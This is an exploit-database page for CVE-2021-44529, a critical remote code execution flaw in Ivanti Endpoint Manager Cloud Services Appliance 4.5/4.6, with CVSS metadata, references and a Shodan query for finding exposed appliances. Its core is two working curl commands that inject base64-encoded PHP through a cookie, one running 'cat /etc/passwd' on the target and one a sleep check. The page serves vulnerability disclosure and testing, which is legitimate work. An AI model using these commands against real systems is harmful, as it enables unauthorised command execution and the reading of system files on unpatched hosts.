header-logo
Suggest Exploit
vendor:
Endpoint Manager
by:
d7x
9.8
CVSS
CRITICAL
Remote Code Execution (RCE)
78
CWE
Product Name: Endpoint Manager
Affected Version From: CSA 4.6 4.5
Affected Version To: EOF Aug 2021
Patch Exists: YES
Related CWE: CVE-2021-44529
CPE: a:ivanti:endpoint_manager
Metasploit:
Other Scripts:
Tags: cve2021,ivanti,epm,csa,injection,packetstorm,cve
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://forums.ivanti.com/s/article/SA-2021-12-02https://twitter.com/Dinosn/status/1505273954478530569https://nvd.nist.gov/vuln/detail/CVE-2021-44529http://packetstormsecurity.com/files/166383/Ivanti-Endpoint-Manager-CSA-4.5-4.6-Remote-Code-Execution.html
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'title:"LANDesk(R) Cloud Services Appliance"', 'vendor': 'ivanti', 'product': 'endpoint_manager_cloud_services_appliance'}
Platforms Tested: Linux x86_64
2022

Ivanti Endpoint Manager 4.6 – Remote Code Execution (RCE)

This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz): https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US. Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)
# Date: 20/03/2022 
# Exploit Author: d7x 
# Vendor Homepage: https://www.ivanti.com/ 
# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6 
# Version: CSA 4.6 4.5 - EOF Aug 2021 
# Tested on: Linux x86_64
# CVE : CVE-2021-44529

###
This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz): 
https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US

Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies

@d7x_real
https://d7x.promiselabs.net
https://www.promiselabs.net
###

# cat /etc/passwd
curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo

# sleep for 10 seconds
curl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo

Navigation

Suggest Exploit

Services By CQR